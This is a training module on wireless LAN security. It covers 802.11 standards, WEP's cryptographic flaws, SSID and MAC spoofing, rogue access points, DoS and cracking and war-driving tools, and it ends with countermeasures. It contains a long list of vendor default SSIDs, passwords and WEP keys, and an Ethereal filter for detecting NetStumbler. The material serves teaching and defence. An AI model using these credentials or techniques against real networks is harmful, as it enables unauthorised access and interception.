Module Objectives

Wireless enables better communication, enhances productivity and enables better customer service. A Wireless LAN allows users to access information beyond their desk, and conduct business anywhere within their offices. But with this comes several security concerns that must be addressed. On completion of this module you will be familiar with the following topics.

• Introduction to 802.11

• What is WEP?

• Finding WLANs

• Cracking WEP Keys

• Sniffing Traffic

• Wireless DoS attacks

• WLAN Scanners

• WLAN Sniffers

• Securing Wireless Networks

• Hacking Tools

 

Concept

A wireless LAN is one in which a mobile user can connect to a local area network (LAN) through a wireless (radio) connection. A standard, IEEE 802.11, specifies the technologies for wireless LANs. The standard includes an encryption method, the Wired Equivalent Privacy algorithm.

A wireless LAN offers a feasible way to provide data connectivity to an existing building where wiring may not be practical due to construction design, location or expense involved. Apart from offering mobility and hence freedom from location restraints, WLANs are gaining popularity due to their ease of use. Typical problems associated with the physical aspects of wired LAN connections do not arise as frequently with a wireless network.

Nevertheless, WLANs do raise the issue of security due to certain inherent features such as radio waves being easier to intercept than physical wires, etc. Though the user authentication and data encryption system known as Wired Equivalent Privacy or WEP is being used; by itself, it falls very short of providing adequate security. Despite the fact that WEP was never intended to provide security and only privacy, it has been seen that most WLANs bank on it to provide security.

Another point to bear in mind is that each access point in a Wi-Fi network shares a fixed amount of bandwidth among all the users who are currently connected to it on a first-come, first- served basis. Since one of the major benefits of wireless networking is user mobility, an important issue to consider is whether users can move seamlessly between access points without having to log in again and restart their applications.

Seamless roaming is only possible if the access points have a way of exchanging information as a user connection is handed off from one to another. Most large corporate data networks are divided into a number of smaller pieces called subnets for traffic management and security reasons. In many instances wireless LAN vendors provide seamless roaming within a single subnet, but not when a user moves from one subnet to another.

However, such solutions are expensive and integrating the various components requires a considerable amount of patient networking expertise. The objective is to deploy and maintain secure, high performance wireless LANs with a minimum amount of time, effort and expense. Wireless networks and access points (APs) are some of the simplest and inexpensive types of targets to footprint and also some of the hardest to detect and scrutinize.

 

Note

For starters, 802.11 is a standard by IEEE, on which wireless LANs are based, allowing for cross vendor products to seamlessly interact with each other. Let us take a look at how this standard works. 802.11 wireless networks should not be confused with Bluetooth, which was developed by a commercial coalition , including Ericsson, Motorola, and Microsoft.

According to this standard, data is encoded using DSSS (direct -sequence spread-spectrum) technology. DSSS works by taking a data stream of zeros and ones and modulating it with a second pattern, termed the chipping sequence. Chipping spreads modulated data across the spectrum in a fashion that makes it possible to tolerate some signal loss.

When this standard was introduced in 1997, the chipping sequence chosen was the Barker code. This is an 11-bit sequence (10110111000) that generates a carrier wave, modulated with Binary or Quadrature Phase Shift Keying (B/QPSK). Modulating with BPSK yields 1 Mbps, while modulating the direct sequence with QPSK 2Mbps.

The basic data stream is exclusive OR'd with the Barker code to generate a series of data objects called chips. Each bit is then "encoded" by the 11-bit Barker code, and each group of 11 chips goes on to encode one bit of data.

802.11b - 2.4.GHz. 11Mbps

The 802.11b standard uses the 2.4GHz band . The 802.11b maintains the same compatibility with the DSSS spectrum and incorporates more coding scheme, called complementary code keying (CCK), to attain a top-end data rate of 11Mbps. Also, a second coding scheme called packet binary convolutional code (PBCC) was included as an option at 5.5 and 11Mbps rates. The CCK modulation technique is a single carrier approach; the signal waveform occupies the entire 22MHz channel, and the data is carried on the full channel waveform. It is important to realize that the 11Mbps rate represents maximum raw bandwidth.

802.11g - 2.4.GHz. 54-Mbps

The new standard 802.11g operates at the 2.4GHz band delivering 54Mbps. The standard uses the CCK-OFDM technique with optional mode of PBCC. It is specified to be backward compatible with 802.11b standard. Some vendor chipsets for wireless incorporate the 802.11g draft standard's mandatory modulation schemes, including Complementary Code Keying (CCK), used in 802.11b, and Orthogonal Frequency Division Multiplexing (OFDM), used in 802.11a transmissions. Using CCK ensures backward-compatibility with the installed 802.11b base, while OFDM provides the speed required for today's high-bandwidth applications.

802.11a - 5GHz, 54Mbps

The 802.11a uses a 5GHz band to achieve data rates of 54Mbps. It uses Orthogonal Frequency Division Multiplexing (OFDM). By utilizing 5GHz spectrum and a different modulation method, it is not interoperable with the 802.11b standard. The OFDM is a multi-carrier approach and is segmented into a number of small sub-channels. The data is pared among these multiple carrier signals. The OFDM radio uses two schemes, binary phase shift keying (BPSK) and quadrature phase shift keying (QPSK), depending on the data rate. The OFDM radio uses BPSK and QPSK for transmitting data rates up to 18 Mbps.

From rates of 18Mbps to 54Mbps, a different coding scheme called quadrature amplitude modulation (QAM) is used. The attractiveness with 802.11a, a 5GHz band, is that it features more channels than the 802.11b, 2.4GHz band. The 54Mbps radio provides 8 non-overlapping channels compared to 3 non-overlapping channels for the 11Mbps radios. However, 5GHz consumes more power and the range is restricted compared to the 2.4GHz band. Additionally, up to 95 percent of the worldwide WLAN market currently has an installed base of 11Mbps radios.

 

Note

Each set of wireless devices communicating directly with each other is called a basic service set (BSS). Several BSSs can be joined together to form one logical WLAN segment, referred to as an extended service set (ESS). A Service Set Identifier (SSID) is simply the 1-32 byte alphanumeric name given to each ESS. SSID helps devices to establish and maintain wireless connectivity with an appropriate access point when multiple independent networks operate in the same physical area. An SSID is also referred to as a Network Name because essentially it is a name that identifies a wireless network.

For example, a departmental WLAN (ESS) may consist of several access points (APs) and dozens of stations , all using the same SSID. Another organization in the same building may operate its own departmental WLAN, composed of APs and stations using a different SSID.

Each AP advertises its presence several times per second by broadcasting beacon frames that carry the ESS name (SSID). Stations can discover APs by passively listening for beacons , or they can send probe frames to actively search for an AP with the desired SSID. Once the station locates an appropriately-named AP, it can send an associate request frame containing the desired SSID. The AP replies with an associate response frame, also containing SSID.

Some frames are permitted to carry a null (zero length) SSID, called a broadcast SSID. For example, a station can send a probe request that carries a broadcast SSID; the AP must return its actual SSID in the probe response. Some APs can be configured to send a zero-length broadcast SSID in beacon frames instead of sending their actual SSID. However, it is not possible to keep an SSID value secret, because the actual SSID (ESS name) is carried in several frames.

 

We have seen that the service set identifier (SSID) is a 32-character unique identifier attached to the header of packets sent over a WLAN that acts as a password when a mobile device tries to connect to the BSS (Basic Service Set). The SSID differentiates one WLAN from another. Therefore, access points and all devices attempting to connect to a specific WLAN must use the same SSID. A device will not be permitted to join the BSS unless it can provide the unique SSID. Because an SSID can be sniffed in plain text from a packet it does not supply any security to the network.

Multiple access points on a network or sub-network can use the same SSID. SSIDs are case sensitive and can contain up to 32 alphanumeric characters . With proper configuration, only clients with the correct SSID can communicate with access points. Access points come with default SSIDs. Security concerns arise when the default values are not changed, as these units can be easily compromised.

SSIDs are transmitted as clear text, exposing them to capture by an attacker monitoring the network's traffic. The 'Secure Access mode' requires the SSID of both client and access point to be synchronized. The default option is off. A non-secure access mode, allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "any."

Attack Methods

From the attacker's perspective, if the target access point responds to a Broadcast SSID Probe, then he might just be in luck. This is because most wireless card drivers are configured with an SSID of ANY so that they will be able to associate with the wireless network. When the SSID is set to ANY, the driver sends a probe request to the broadcast address with a zero-length SSID, causing most access point that will respond to these requests to issue a response with its SSID and info . Though this configuration makes it easier for the user, as the user does not have to remember the SSID to connect to the wireless LAN, it makes it much simpler for attackers to gather SSIDs. Some of the common default passwords are: 3Com AirConnect 2.4 GHz DS ( newer 11mbit, Harris/Intersil Prism based) Default SSID: 'comcomcom' 3Com other Acccess Points Default SSID: '3com' Addtron (Model:?) Default SSID: 'WLAN' Cisco Aironet 900Mhz/2.4GHz BR1000/e, BR5200/ e and BR4800 Default SSID: 'tsunami'; '2' Console Port: No Default Password Telnet password: No Default Password HTTP management: On by default, No Default Password Apple Airport Default SSID: 'AirPort Network'; 'AirPort Netzwerk' BayStack 650/660 802.11 DS AP Default SSID: 'Default SSID' Default admin pass: <none> Default Channel: 1 MAC addr: 00:20:d8:XX:XX:XX Compaq WL-100/200/300/400 Default SSID: 'Compaq' Dlink DL-713 802.11 DS Access Point Default SSID: 'WLAN' Default Channel: 11 Default IP address: DHCP-administered INTEL Pro/Wireless 2011 802.11 DSSS - PC Card Default SSID: '101' ; 'xlan' ; 'intel' ; '195' Default Channel: 3 INTEL Pro/Wireless 2011 802.11 DSSS - Access Point Default SSID: '101' ; '195' LINKSYS WAP-11 802.11 DS Access Point Default SSID: 'linksys' Default Channel: 6 Default WEP key one: 10 11 12 13 14 15 Default WEP key two: 20 21 22 23 24 25 Default WEP key three: 30 31 32 33 34 35 Default WEP key four: 40 41 42 43 44 45 LINKSYS WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card Default SSID: 'linksys' ; 'Wireless' Default Channel: 3 ; 6 ; 11 Netgear 802.11 DS ME102 / MA401 Default SSID: 'wireless' Default Channel: 6 Default IP address: 192.168.0.5 Default WEP: Disabled Default WEP KEY1: 11 11 11 11 11 Default WEP KEY2: 20 21 22 23 24 Default WEP KEY3: 30 31 32 33 34 Default WEP KEY4: 40 41 42 43 44 Default MAC: 00:30:ab:xx:xx:xx SMC Access Point Family SMC2652W Default SSID: 'WLAN' Default Channel: 11 Default HTTP: user: default pass: WLAN_AP Default MAC: 00:90:d1:00:b7:6b (00:90:d1:xx:xx:xx) Console Port: No Password, AT command set SMC 2526W Wireless Access Point Dual-Dipole Default SSID: 'WLAN' Default IP: 192.168.0.254 Default MAC: 00:90:d1:00:11:11(00:90:d1:xx:xx:xx) Default AP Name: MiniAP Default Channel: 11 Default Admin Pass: MiniAP SMC 2682W EZ-Connect Wireless Bridge Default SSID: 'BRIDGE' Default Channel: 11 Default Admin pass: WLAN_BRIDGE Default MAC:00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx) SOHOware NetBlaster II Default SSID: same as mac Default MAC:00:80:c6:xx:xx:xx Default Channel:8 Symbol AP41x1 and LA41x1 / LA41X3 802.11 DS Default SSID: '101 Default MAC: 00:a0:0f:xx:xx:xx Default WEP key one: 10 1112 13 14 15 Default WEP key two: 20 21 22 23 24 25 Default WEP key three: 30 31 32 33 34 35 Default WEP key four: 40 41 42 43 44 45 TELETRONICS WL-Access Point Default SSID: 'any' Default Password: 1234 Console Port: No password, AT command set Wave Lan Family Default SSID: 'WaveLAN Network' Default channel: 3 ZCOMAX Access Point XWL450 Default SSID: 'any'; 'mello' ; 'Test' Default password: 1234 Console Port: No Password, AT command set ZYXEL Prestige 316 Gateway/Natbox/WirelessBridge Default SSID: 'Wireless' Default Channel: 1 Default console pass: 1234 Default telnet pass: 1234 Console Port: Same password for system, ansi/vt100 terminal 1stWave Access Points Default SSID: '1stWave' ELSA Lancom Wireless L-11 / AirLancer Default SSID: 'ELSA'

 

Concept

Wired Equivalent Privacy (WEP) Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. WEP is 802.11's optional encryption standard implemented in the MAC Layer that most radio network interface card (NIC) and access point vendors support.

Role of WEP in Wireless Communication

WEP is used to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. Though this function has not been explicitly mentioned in the 802.11 standard, it is generally considered to be a feature of WEP.

WEP relies on a secret key that is shared between a mobile station (e.g. a laptop with a wireless Ethernet card) and an access point (i.e. a base station). The secret key is used to encrypt packets before they are transmitted, and an integrity check is used to ensure that packets are not modified in transit.

If a user activates WEP, the NIC encrypts the payload (frame body and CRC) of each 802.11 frame before transmission using an RC4 stream cipher provided by RSA Security. The receiving station, such as an access point or another radio NIC, performs decryption upon arrival of the frame. As a result, 802.11 WEP only encrypts data between 802.11 stations. Once the frame enters the wired side of the network, such as between access points, WEP no longer applies.

Note

Working of WEP and Security Concern WEP uses the RC4 encryption algorithm, also known as a stream cipher. A stream cipher operates by expanding a short key into an infinite pseudo-random key stream. Before transmission takes place, WEP combines the keystream with the payload/ICV through a bitwise XOR process, which produces ciphertext (encrypted data). XORing the key stream with the ciphertext yields the original plaintext. WEP includes the IV in the clear (unencrypted) within the first few bytes of the frame body. The receiving station uses this IV along with the shared secret key supplied by the user of the receiving station to decrypt the payload portion of the frame body.

In most cases the sending station will use a different IV for each frame. When transmitting messages the beginning of each encrypted payload will be equivalent when using the same key. This means that after encrypting the data, the beginnings of the frames would be the same, offering a pattern that can facilitate attackers in cracking the encryption algorithm. WEP guards against this by allowing different IVs to be used, though the key used is the same.

Threat

However, the 802.11b standard does not discuss how the shared key is established in practice. Typically, most installations use a single key that is shared between all mobile stations and access points. This raises the security concern as an attacker can flip a bit in the ciphertext, so that upon decryption, the corresponding bit in the plaintext is also flipped .

Moreover if he can intercept two ciphertexts encrypted with the same key stream, he can obtain the XOR of the two plaintexts. Knowledge of this XOR can enable statistical attacks to recover the plaintexts. The probability of success of statistical attacks increases in direct proportion to the ciphertexts using the same key stream. It becomes a trivial exercise to recover all plaintexts, once the attacker knows one of them. Let us look why this is possible.

Note

Encryption Process As part of the encryption process, WEP prepares a key schedule ("seed") by concatenating the shared secret key supplied by the user of the sending station with a random-generated 24-bit initialization vector (IV). The IV lengthens the life of the secret key because the station can change the IV for each frame transmission. WEP inputs the resulting "seed" into a pseudo-random number generator (PRNG) that produces a key stream equal to the length of the frame's payload plus a 32-bit integrity check value (ICV).

The ICV is a check sum that the receiving station eventually recalculates and compares to the one sent by the sending station to determine whether the transmitted data underwent any form of tampering while intransient. If the receiving station calculates an ICV that doesn't match the one found in the frame, then the receiving station can reject the frame or flag the user.

WEP specifies a shared secret 40 or 64-bit key to encrypt and decrypt the data. Some vendors also include 128 bit keys (know as "WEP2") in their products. With WEP, the receiving station must use the same key for decryption. Each radio NIC and access point, therefore, must be manually configured with the same key.

Before transmission takes place, WEP combines the key stream with the payload/ICV through a bitwise XOR process, which produces ciphertext (encrypted data). WEP includes the IV in the clear (unencrypted) within the first few bytes of the frame body. The receiving station uses this IV along with the shared secret key supplied by the user of the receiving station to decrypt the payload portion of the frame body.

We will consider the 64-bit key generator here. In the figure below, the ASCII text "PassPhrase" is mapped to 32-bit value with XOR. The XOR operation guarantees four zero bits. However, since the input is ASCII, high bit of each character is always zero. The XOR of these high bits is also zero. Therefore only seeds from 00:00:00:00 through 7f:7f:7f:7f can occur.

The resultant value is used as seed to 32-bit linear congruential PRNG (Pseudo Random Number Generator). Forty values are generated from PRNG, of which one byte is taken from each 32-bit result. Now, for each 32-bit output, only bits 16 through 23 are used. This flaw results in low bits being "less random" than the higher bits. The 64-key generator is a linear congruential generator modulo 2^32. Bit 0 has a cycle length of 2^1, Bit 3 has a cycle length of 2^4, etc. Therefore the resultant bytes can have a cycle length of 2^24. This makes seeds 00:00:00:00 through 00: ff: ff: ff only to result in unique keys. This implies that the 64-key generator has an entropy of 21-bits, as the number of unique keys that can be generated is 2^21.

Threat

Security Issues WEP is vulnerable because of relatively short IVs and keys that remain static. It is not the RC4 algorithm that is at fault, but the fact that the entropy of the key generator is only 21. With only 24 bits, WEP ultimately uses the same IV for different data packets.

This means that the chance for collision is high. For instance, in a large and busy network, this can happen within an hour or so due to the reoccurrence of IVs. This result in the transmission of frames having keystreams that is comparable. If an attacker manages to collect enough frames based on the same IV (which is a minimum of two packets), he can determine the shared values among them, i.e., the keystream or the shared secret key.

He can therefore decrypt any of the 802.11 frames. The static nature of the shared secret keys only adds to this problem. 802.11 do not provide any functions that support the exchange of keys among stations. As a result, system administrators and users generally use the same keys for weeks, months, and even years .

Note

Issues Plaguing WEP Key Management Keys are manually distributed Keys are statically configured (therefore infrequently changed and easy to remember) It uses four 40-bit keys (or one 104-bit key) Key values can be directly set as hex data Key generators provided for convenience. Note that ASCII string is converted into keying material. Though not specified by the standard, it is widely used. There are different key generators for 64- and 128-bit encryption. [1]

 

Most vendors have implemented MAC-level access controls to add security to the nature of 802.11. This will provide added security if the admin defines a list of "approved" client MAC addresses that will be allowed to connect to the access point. This is not always practical in large networks. Besides, the MAC address does not provide a good security mechanism because it is both easily observable and reproducible.

Attack Methods

Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker as they appear in the clear format. Moreover, it is possible to change the MAC address on wireless cards using suitable software. An attacker can use the same option to masquerade as a valid MAC address by programming the wireless card, and accessing the wireless network using the wireless pipes. Therefore, any MACs can be sniffed off the network with a wireless sniffer, and the attacker's MAC address can be changed easily in most cases.

Attack Methods

An attacker will be able to spoof a connection if he holds wireless equipment and is near a wireless network. To do this he must first setup an access point near the target wireless network or in a place where wireless Internet is believed to be available by the victim. If the attacker's access point has a signal stronger than the signal of the real access point, then the victim's computer will connect to the attacker's access point. Once the victim establishes the connection, the attacker can steal his password, network access and compromise his computer etc. This attack is used mainly for password acquisition.

 

Wireless networks are extremely vulnerable to DoS attacks. It can slow the network to crawling speeds or actually force it to quit working. In the "brute force" DoS attack method, a huge flood of packets can use up all of the network's resources and force it to shut down, or a very strong radio signal that totally dominates the airwaves can render access points and radio cards useless.

A hacker can initiate a packet-based brute force DoS attack by using other systems on the network to send the useless packets to the server. This adds significant overhead on the network and takes away useable bandwidth from legitimate users.

Note

A DoS occurrence on a wireless network may not be deliberate. 802.11b resides in a spectrum; other 2.4GHz devices such as cordless phones, microwaves , Bluetooth may cause a significant reduction in 802.11b functioning. To expound the vulnerability, place a laptop with an 802.11b NIC next to a microwave oven. As both devices usually use the 2.4 GHz band, signal degradation on the 802.11b network is likely to occur any time the microwave is in operation. An attacker could use the same principle to disable or degrade an 802.11b network by broadcasting traffic on the same frequency as the network. The Wi-Fi Protected Access (WPA) is vulnerable to a type of DoS attack.

WPA uses mathematical algorithms to authenticate users to the network. If a user is trying to get in and sends two packets of unauthorized data within one second, WPA will assume it is under attack and shut down. While this safeguards against security breaches, it allows the attacker to cause damage by sending data frames cyclically, causing constant shutdowns.

 

Tools

NetStumbler, written by Marius Milner, scans and logs the name, signal strength and other technical details of any 802.11b wireless networks it finds. NetStumbler works by utilizing active scanning techniques through the use of probe requests sent to a broadcast address with a broadcast BSSID and an unspecified ESSID (length of 0).

NetStumbler is a Windows -based war-driving tool that will detect wireless networks and mark their relative position with a GPS. NetStumbler uses an 802.11 Probe Request sent to the broadcast destination address, causing all access points in the area to issue 802.11 Probe Response containing network configuration information, such as their SSID and WEP status. When hooked up to a GPS, NetStumbler will record a GPS coordinate for the highest signal strength found for each access point. Using the network and GPS data, the user can create maps with tools such as Microsoft MapPoint.

NetStumbler supports the Hermes chipset cards on Windows 2000, the most popular being the Lucent (now Proxim) Orinoco branded cards. On Windows XP the NDIS 5.1 networking library has 802.11 capabilities itself, which allows NetStumbler to be used with most cards that support it. To use NetStumbler, the user inserts his wireless card and sets his SSID or network name to ANY. As discussed before, this instructs the driver to use a zero-length SSID in its Probe Requests, causing most access points to respond to Probe Requests along with their SSID or a zero-length SSID.

The probe requests are difficult to be detected as that from NetStumbler activity as NetStumbler utilizes the active scanning method described in the IEEE 802.11 specification without anomalous characteristics. Once an AP is discovered , NetStumbler will probe the AP for its information, often the same information stored in the SNMP MIB system.sysName.o parameter.

Note

How does one detect NetStumbler activity? NetStumbler's primary weakness is that it relies on one form of wireless network detection, the Broadcast Probe Request. The LLC/SNAP frame contains unique characteristics that allow NetStumbler activity identification. The LLC-encapsulated frames generated by NetStumbler will use an organizationally unique identifier (OID) of 0x00601d and protocol identifier (PID) of 0x0001. NetStumber also uses a data payload size of 58 bytes containing a unique string that can be used to identify the version of NetStumbler:

Each NetStumbler Version has a typical payload string. For instance, version 3.2.0 carries Flurble gronk bloopit, bnip Frundletrune; 3.2.3 uses 'All your 802.11b are belong to us'; 3.3.0 has a payload string that is intentionally left blank. To identify NetStumbler traffic one can use the following Ethereal display filter to detect any of the data string patterns that match the OUI and PID criteria:

(Wlan.fc.type_subtype eq 32 and llc.oui eq 0x00601d and llc.pid eq 0x0001) and (data [4:4] eq 41:6c:6c:20 or data [4:4] eq 6c:46:72:75 or data [4:4] eq 20:20:20:20)

 

Tools

AiroPeekNX is a commercial 802.11 monitoring and analysis tool available for Windows 2000 and XP. AiroPeek monitors a specific channel and reports on data rates, error rates, addresses seen and their activity; captures all 802.11b control, data and management frames; decodes and reports on protocols in use (TCP/IP, AppleTalk, NetBEUI and IPX); and performs statistical analysis of all traffic or filtered sets of captured packets.

AiroPeek's customizable 3-pane view, allows the user to display a packet capture list, a single packet decode, as well as the hex view of raw data, altogether or in any combination. He can navigate through multiple selected packets to reconstruct the threads of network conversations. Multiple capture windows can be open simultaneously for easy comparison of packet views, protocol usage, or total traffic vs. traffic subsets .

AiroPeek supports Lucent and Cisco 802.11b cards and also has support for some of the newer 802.11a cards. AiroPeek NX is primarily designed for wireless network troubleshooting and analysis. AiroPeek NX supports channel scanning at a user-defined interval as well as decrypting traffic on the fly with a provided WEP key. AiroPeek NX's filtering is also configurable. AiroPeek NX also provides a useful Nodes view, which groups detected stations by their MAC address and will also show IP addresses and protocols observed for each.

AiroPeek NX has a new view called the SSID Tree, available on the Nodes Tab. The SSID Tree provides an intuitive, hierarchical view, displaying the relationship between WLAN ESSIDs, Access Points and their associated Stations. The SSID Tree also facilitates the auditing of Encryption and Authentication schemes in use.

AiroPeek can fully decode all 802.11 protocols, displaying management, control and data packets as well as all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. AiroPeek tells you the status, length, and timestamp of a packet immediately, adding:

• The speed at which the packet was transmitted

• The channel number and radio frequency at which the packet was transmitted

• The signal strength of the transmission in which the packet was received. ^[2]

 

Tools

AirSnort tool is a collection of the scripts and programs derived from the research conducted by Tim Newsham, the University of Maryland, and the University of California at Berkley. AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. AirSnort requires approximately 5-10 million encrypted packets to be gathered. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second. Weak IV's are collected and sorted according to which key byte they help to expose. A weak IV can assist in exposing only one key byte. When a sufficient number of weak IVs have been gathered for a particular key byte, statistical analysis will show a tendency towards a particular value for that key byte.

Each of the 256 possible values for a given key byte is scored as to their probability of being the correct value. The crack process makes a key guess based on the highest ranking values in the statistical analysis phase. The number of guesses that airsnort will make for each key byte is governed by the 'breadth' parameter in the preferences section of airsnort. This is because weak IVs are not distributed in a linear fashion across the entire IV space.

It has two modes. The monitor mode enables a wireless NIC to capture packets without associating with an access point or ad-hoc network. This is desirable when the user does not want to transmit any packets. In fact transmitting is sometimes not possible while in monitor mode (driver dependent). Another aspect of monitor mode is that the NIC does not consider whether the CRC values are correct for packets captured in monitor mode, as some packets may in fact be corrupted. Promiscuous mode allows the user to view all wireless packets on a network to which he is associated. The need to associate means that the user must have some means of authenticating himself with an access point. In promiscuous mode, packets are not seen until the user has associated. Not all wireless drivers support promiscuous mode.

 

Tools

Kismet is a Linux and BSD-based wireless sniffer with war-driving functionality. It allows the user to track wireless access points and their GPS locations. Kismet is a passive network-detection tool that can cycle through available wireless channels looking for 802.11 packets that indicate the presence of a wireless LAN, such as Beacons and Association Requests. Kismet can also gather additional information about a network if it can, such as IP addressing and Cisco Discovery Protocol (CDP) names . Kismet works with any 802.11b wireless card which is capable of reporting raw packets (rfmon support), which include any prism2 based card (Linksys, D-Link, Rangelan, etc), Cisco Aironet cards, and Orinoco based cards. Kismet also supports the WSP100 802.11b remote sensor by Network Chemistry and is able to monitor 802.11a networks with cards which use the ar5k chipset. GPS support is provided via the GPSD daemon. GPSD is also included with the navigation software GPSDrive. Current versions of GPSDrive distribute a GPSD which will work with Kismet, however earlier versions (1.17 and earlier) did not. GPSD provides network accessible GPS data from a wide variety of GPS receivers.

Kismet can use a GPSD running on the local server or on a remote. Kismet will write an XML log file of the travel path taken and the packets seen. The gpsmap program that comes with Kismet will plot these files to a graphical map. Other features of Kismet include supporting multiple packet sources, channel hopping , detecting IP blocks, detecting Cisco product via CDP, logging as ethereal/tcpdump compatible file, logging Airsnort-compatible "interesting" ( cryptographically weak) packets, de-cloaking hidden SSIDs, grouping and custom naming of SSIDs, multiple clients viewing a single capture stream, graphical mapping of data (gpsmap), cross-platform support (handheld Linux and BSD), manufacturer identification, detection of default access point configurations, detection of NetStumbler clients, runtime decoding of WEP packets and multiplexing of multiple capture sources. ^[3]

 

Tools

Let's take a look at the structure of WEP Crack. The tool is divided into four parts : The packet collector, the guess generator, mapping guesses to the Keys and the Key Verifier. The packet collector collects the appropriate packets needed for guess verification - i.e. 802.11 DATA packets. A minimum of two packets are collected.

It can also read from pcap-format file. This simplifies design and allows for off-line cracking. The capture may be done using utilities such as PrismDump which already output to this format. The guess generator helps in the dictionary attack by reading wordlist from file or assist in brute force by generating sequential PRNG seeds between 00:00:00:00 and 00:7f:7f:7f. In mapping guesses to the keys, WEPCrack can directly translate ASCII to key bytes (Five ASCII bytes mapped to a single 64-bit WEP key / Thirteen ASCII bytes mapped to the 128-bit WEP key / Truncation of long words, zero-fill for short words) and use any of the key generator functions (Map ASCII to keys with 64-bit generator / Map ASCII to keys with 128-bit generator / Map PRNG seeds to keys with 64-bit generator)

 

Network discovery tools run on 802.11 stations and passively monitor beacon and probe response frames. Some actively probe for APs and stations configured for peer to peer. They typically display discovered devices by SSID, channel, MAC address and location (when used with a GPS), generating basic data that can be saved to a file.

• NetStumbler is a freeware AP discovery tool for Win32 systems.

• MacStumbler is freeware AP discovery software for Mac OS X and Apple Airport adapters.

• WaveStumbler is a freeware WLAN mapper for Linux.

• AirTouch Network's Security System War Driving Kit is a commercial war-driving kit, complete with sniffing software, 802.11b adapter and antenna.

Vulnerability assessment tools, in addition to network discovery, sniff traffic to spot security policy violations (e.g., APs with default SSID, stations or APs in open-system mode). They query APs to obtain system information and identiiy risks (e.g., open ports). Assessment tools build a database of known APs and stations so that rogue devices and changes can be highlighted when repeated at regular intervals. They generate alerts or reports that document vulnerabilities.

• AirMagnet's Handheld/Laptop Analyzer series are portable analyzers for Win32 laptops and Pocket PC 2002.

• Internet Security Systems' Wireless Security Scanner is a Windows 2000 based vulnerability checker with limited penetration scanning.

• WaveSecurity's WaveScanner is detection, assessment and reporting tool for Linux; uses Prism2 adapters.

Traffic monitoring and analysis tools also provide discovery and vulnerability alerting. In addition, they capture and examine packet content (not just headers), so that applications' behavior can be examined. They're typically used for security and performance troubleshooting and trend analysis.

• Wild Packets' AiroPeek is a real-time analyzer for 802.11a and b; runs on Windows XP/2000.

• Network Instruments' Network Observer is a real-time analyzer for 802.11a/b, Token Ring, and FDDI for Win32.

• Network Associates' Sniffer Wireless real-time analyzer for 802.11a/b runs on Win32 and Pocket PC 2002.

• Ethereal is a freeware network protocol analyzer with WLAN support on certain platforms.

Intrusion Detection: As in wired networks, IDSes provide 24/7 network-layer monitoring for possible intrusions. IDSes may use signature analysis, protocol inspection, rules enforcement and/or anomaly detection.

• Air Defense's Air Defense Guard IDS appliance employs remote sensors to capture 802.11 packets and send summaries to central IDS engine.

• Latis Networks' Still Secure Border Guard is a WLAN gateway that focuses on intrusion detection and content filtering for 802.11, stripping worms and similar viral payload at the gateway.

 

Countermeasure

WIDZ version 1 is a proof of concept IDS system for 802.11 that guards an AP(s) and Monitors local frequencies for potentially malevolent activity. It detects scans, association floods, and bogus/Rogue AP's. It can easily be integrated with SNORT or Real Secure.

The widz_apmon.c module covers two threats: -

• Bogus APS are designed to steal the association. Once this is achieved login credentials can be retrieved or a man in the middle attacks can be performed.

• Unauthorized AP are the ones that usually allow all and sundry access to the corporate LAN without a password.

The widz_probemon.c module has two functions:

• Probe monitoring - Picks up probe requests which don't have the ESSId field set in the probe.

• Flood detection - Picks up attempts to flood the AP with associations

A program named Alert will be executed each time an Alert is raised. The WiDZ package provides an example script which shows how to send a syslog message, write to the console or current terminal, send a SNMP trap and send an email.

 

Countermeasure

Treat Access Points As Untrusted - Access points need to be identified and evaluated on a regular basis to determine if they need to be quarantined as untrusted devices before wireless clients can gain access to internal networks. This determination means appropriate placement of firewalls, virtual private networks (VPN), intrusion detection systems (IDS), and authentication between access point and intranets or the Internet.

Countermeasure

Access Point Configuration Policy - Administrators need to define standard security settings for any 802.11b access point before it can be deployed. These guidelines should cover SSID, WEP keys and encryption, and SNMP community words.

Countermeasure

Access Point Discovery - Administrators should regularly search outwards from a wired network to identify unknown access points. Several methods of identifying 802.11b devices exist, including detection via banner strings on access points with either Web or telnet interfaces. Wireless network searches can identify unauthorized access points by setting up a 2.4 GHz monitoring agent that searches for 802.11b packets in the air.

These packets may contain IP addresses that identify which network they are on, indicating that rogue access points are operating in the area. One important note: this process may pick up access points from other organizations in densely populated areas.

Countermeasure

Access Point Security Assessments - Regular security audits and penetration assessments quickly identify poorly configured access points, default or easily guessed passwords and community words, and the presence or absence of encryption. Router ACLs and firewall rules also help minimize access to the SNMP agents and other interfaces on the access point.

Countermeasure

Wireless Client Protection - Wireless clients need to be regularly examined for good security practices. These procedures should include the presence of some or all of the following: Distributed personal firewalls to lock down access to the client VPNs to supplement encryption and authentication beyond what 802.11b can provide. It can also destroy the throughput on a wireless network. Intrusion detection and response to identify and minimize attacks from intruders, viruses, Trojans and backdoors Desktop assessments to identify and repair security issues on the client device [4]

 

Countermeasure

Some countermeasures while taking an out of the box security is to ensure that WEP (Wired Equivalent Privacy) is turned on. WEP has two variants: 40-bit encryption also known as 64-bit WEP. To access to a 64-bit WEP the user needs to know a 10 digit alphanumeric network key. The second variant, 104-bit WEP encryption has a 26 digit key. Rotating WEP keys monthly is a good practice.

 

Countermeasure

Remote Authentication Dial-In User Service (RADIUS) is a widely deployed protocol enabling centralized authentication, authorization, and accounting for network access. Originally developed for dial-up remote access, RADIUS is now supported by virtual private network (VPN) servers, wireless access points, authenticating Ethernet switches, Digital Subscriber Line (DSL) access, and other network access types. The RADIUS protocol is a client/server security protocol defined in the lETF's RFCs 2138 and 2139. RADIUS allows network managers to reduce the risk of distributing security information across many devices by centralizing authentication and permission attributes in a single server.

RADIUS is a standard technology that is used to protect access to wireless networks. RADIUS is a user name and password scheme that enables only approved users to access the network; it does not affect or encrypt data.

